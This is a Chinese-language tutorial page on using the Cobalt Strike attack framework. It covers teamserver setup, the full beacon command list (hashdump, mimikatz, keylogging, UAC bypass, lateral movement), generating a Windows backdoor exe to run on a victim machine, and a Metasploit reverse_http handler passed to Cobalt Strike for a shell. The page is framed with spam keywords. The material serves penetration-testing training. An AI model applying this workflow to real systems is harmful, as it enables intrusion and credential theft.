91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行內網滲透神器簡單使用

發布時間:2021-12-24 14:09:55 來源:億速云 閱讀:147 作者:柒染 欄目:網絡管理

如何進行內網滲透神器簡單使用,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

一、介紹內網滲透的神器工具CobaltStrike

Cobalt Strike 一款以Metasploit為基礎的GUI框架式滲透測試工具,集成了端口轉發、服務掃描,自動化溢出,多模式端口監聽,exe、powershell木馬生成等。

釣魚攻擊包括:站點克隆,目標信息獲取,java執行,瀏覽器自動攻擊等。

Cobalt Strike 主要用于團隊作戰,可謂是團隊滲透神器,能讓多個攻擊者同時連接到團體服務器上,共享攻擊資源與目標信息和sessions。

Cobalt Strike 作為一款協同APT工具,針對內網的滲透測試和作為apt的控制終端功能,使其變成眾多APT組織的首選。

文件內容如下:

如何進行內網滲透神器簡單使用

二、啟動CobaltStrike

1.啟動服務端CobaltStrike

服務端關鍵文件teamserver與cobaktstrike.jar

打開命令界面,切換到文件夾目錄下,輸入sudo ./teamserver <host> <password> [/path/to/c2.profile]

1 - 必填參數host 本服務器外網IP/域名

2 - 必填參數password Client GUI連接時需要輸入的密碼

3 - 可選參數Malleable C2 communication profile 指定C2通信配置文件該功能體現了CS

示例:本機IP:192.168.1.136

如何進行內網滲透神器簡單使用

2.打開客戶端cobaltstrike.jar,配置按照啟動服務的配置進行。

如何進行內網滲透神器簡單使用

點擊連接,進入主界面。

如何進行內網滲透神器簡單使用

三、參數介紹

1.Cobalt Strike

如何進行內網滲透神器簡單使用

1- 新建鏈接(可以支持多個服務端)

2- 設置(配置控制臺界面)

3- 可視化(展示控制的形式)

4- VPN接口(配置VPN)

5- 監聽器(管理監聽配置)

6- 腳本管理器(管理腳本,用于管理第三方腳本)

2.視圖

如何進行內網滲透神器簡單使用

1- 應用信息(顯示被攻擊著的機器的應用信息)

2- 憑證信息(通過hashdump或者獼猴桃抓到的密碼都會保存到此處)

3- 文件下載(下載文件)

4- 日志(事件記錄)

5- 鍵盤記錄

6- 代理信息

7- 屏幕截圖(截取被攻擊者的屏幕)

8- 腳本控制臺(腳本的命令執行的界面)

9- 目標(顯示目標主機)

10- web日志

如何進行內網滲透神器簡單使用

3.攻擊

如何進行內網滲透神器簡單使用

1- HTML Application (生成惡意的HTA木馬文件)

2- MS Office Macro (生成office宏病毒文件)

3- Payload Generator (生成各種語言版本的payload)

4- Windows Executable (生成可執行Payload)

5- Windows Executable(S)(把包含payload,Stageless生成可執行文件(包含多數功能)

如何進行內網滲透神器簡單使用

1- web服務管理(對開啟的web服務進行管理)

2- 克隆網站

3- 文件下載(提供web下載文件)

4- Scripted Web Delivery (提供Web服務,便于下載和執行PowerShell Payload,類似于Metasploit的web_delivery)

5- 簽名Applet攻擊(啟動一個Web服務以提供自簽名Java Applet的運行環境)

6- 智能攻擊(自動檢測Java版本并利用已知的exploits繞過security)

7- 信息搜集(獲取系統信息)

4.beacon命令

beacon> help

Beacon Commands

===============

Command                   Description

-------                   -----------

argue                     進程參數欺騙

blockdlls                 阻止子進程加載非Microsoft DLL

browserpivot              注入受害者瀏覽器進程

bypassuac                 繞過UAC提升權限

cancel                    取消正在進行的下載

cd                        切換目錄

checkin                   強制讓被控端回連一次

clear                     清除beacon內部的任務隊列

connect                   Connect to a Beacon peer over TCP

covertvpn                 部署Covert VPN客戶端

cp                        復制文件

dcsync                    從DC中提取密碼哈希

desktop                   遠程桌面(VNC)

dllinject                 反射DLL注入進程

dllload                   使用LoadLibrary將DLL加載到進程中

download                  下載文件

downloads                 列出正在進行的文件下載

drives                    列出目標盤符

elevate                   使用exp

execute                   在目標上執行程序(無輸出)

execute-assembly          在目標上內存中執行本地.NET程序

exit                      終止beacon會話

getprivs                  Enable system privileges on current token

getsystem                 嘗試獲取SYSTEM權限

getuid                    獲取用戶ID

hashdump                  轉儲密碼哈希值

help                      幫助

inject                    在注入進程生成會話

jobkill                   結束一個后臺任務

jobs                      列出后臺任務

kerberos_ccache_use       從ccache文件中導入票據應用于此會話

kerberos_ticket_purge     清除當前會話的票據

kerberos_ticket_use       Apply 從ticket文件中導入票據應用于此會話

keylogger                 鍵盤記錄

kill                      結束進程

link                      Connect to a Beacon peer over a named pipe

logonpasswords            使用mimikatz轉儲憑據和哈希值

ls                        列出文件

make_token                創建令牌以傳遞憑據

mimikatz                  運行mimikatz

mkdir                     創建一個目錄

mode dns                  使用DNS A作為通信通道(僅限DNS beacon)

mode dns-txt              使用DNS TXT作為通信通道(僅限D beacon)

mode dns6                 使用DNS AAAA作為通信通道(僅限DNS beacon)

mode http                 使用HTTP作為通信通道

mv                        移動文件

net                       net命令

note                      備注

portscan                  進行端口掃描

powerpick                 通過Unmanaged PowerShell執行命令

powershell                通過powershell.exe執行命令

powershell-import         導入powershell腳本

ppid                      Set parent PID for spawned post-ex jobs

ps                        顯示進程列表

psexec                    Use a service to spawn a session on a host

psexec_psh                Use PowerShell to spawn a session on a host

psinject                  在特定進程中執行PowerShell命令

pth                       使用Mimikatz進行傳遞哈希

pwd                       當前目錄位置

reg                       Query the registry

rev2self                  恢復原始令牌

rm                        刪除文件或文件夾

rportfwd                  端口轉發

run                       在目標上執行程序(返回輸出)

runas                     以其他用戶權限執行程序

runasadmin                在高權限下執行程序

runu                      Execute a program under another PID

screenshot                屏幕截圖

setenv                    設置環境變量

shell                     執行cmd命令

shinject                  將shellcode注入進程

shspawn                   啟動一個進程并將shellcode注入其中

sleep                     設置睡眠延遲時間

socks                     啟動SOCKS4代理

socks stop                停止SOCKS4

spawn                     Spawn a session

spawnas                   Spawn a session as another user

spawnto                   Set executable to spawn processes into

spawnu                    Spawn a session under another PID

ssh                       使用ssh連接遠程主機

ssh-key                   使用密鑰連接遠程主機

steal_token               從進程中竊取令牌

timestomp                 將一個文件的時間戳應用到另一個文件

unlink                    Disconnect from parent Beacon

upload                    上傳文件

wdigest                   使用mimikatz轉儲明文憑據

winrm                     使用WinRM橫向滲透

wmi                       使用WMI橫向滲透

四、使用Cobalt strike

1.創建監聽器

如何進行內網滲透神器簡單使用

注:cs中提供了8種監聽器:

beacon_xx 系列為Cobalt Strike自身,包括 dns、http、https、smb 四種方式的監聽器。

foreign系列為外部監聽器,通常與MSF或者Armitage聯動。

如何進行內網滲透神器簡單使用

創建好之后會顯示監聽開始

如何進行內網滲透神器簡單使用

2.生成后門

點擊攻擊----生成后門---Windows Executable

監聽器選擇我們剛才創建的,根據攻擊的系統選擇64位還是32位。

如何進行內網滲透神器簡單使用

保存生成后門的exe文件。

3.連接

將生成的后門程序,上傳到受害者的機器上,運行,發現主機上線。

如何進行內網滲透神器簡單使用

在主機右鍵,進入beacon,可以進行下一步命令執行操作。

如何進行內網滲透神器簡單使用

備注:beacon的命令執行功能較少用起來不方便,可以使用Ladon腳本。

Ladon腳本下載地址:https://github.com/k8gege/Ladon

Ladon具體使用方法:https://github.com/k8gege/Aggressor

4.提權

在上線主機右鍵后,點擊提權,選擇uac提權。

如何進行內網滲透神器簡單使用

成功后會出現一個新的主機。之后的操作可以在新的主機進行。

如何進行內網滲透神器簡單使用

五、與MSF聯動

Kali IP:172.16.20.18

受害者機器:172.16.20.20

CS:172.16.20.19

1.在MSF中創建監聽器

msf5 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http

payload => windows/meterpreter/reverse_http

msf5 exploit(multi/handler) > set lhost 172.16.20.18

lhost => 172.16.20.18

msf5 exploit(multi/handler) > set lport 3333

lport => 3333

msf5 exploit(multi/handler) > run

如何進行內網滲透神器簡單使用

注:監聽監聽kali自身地址。

2.在CS中設置新的監聽地址

如何進行內網滲透神器簡單使用

注意:payload要與msf中的payload要一致。

在控制中右鍵--增加會話,選擇msf的會話。

如何進行內網滲透神器簡單使用

此時拿到meterpreter。

如何進行內網滲透神器簡單使用

輸入shell,進入主機命令操作。

如何進行內網滲透神器簡單使用

如何進行內網滲透神器簡單使用

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

湄潭县| 黎平县| 海盐县| 祥云县| 庆城县| 博乐市| 英山县| 大冶市| 宝清县| 澄江县| 遂昌县| 巴楚县| 信丰县| 霍州市| 溆浦县| 郎溪县| 加查县| 白山市| 平南县| 务川| 玉环县| 金堂县| 横山县| 平和县| 平乐县| 垫江县| 正安县| 高雄县| 科尔| 墨竹工卡县| 镇远县| 古蔺县| 长垣县| 临武县| 太康县| 将乐县| 二手房| 甘洛县| 溧水县| 拉孜县| 河北区|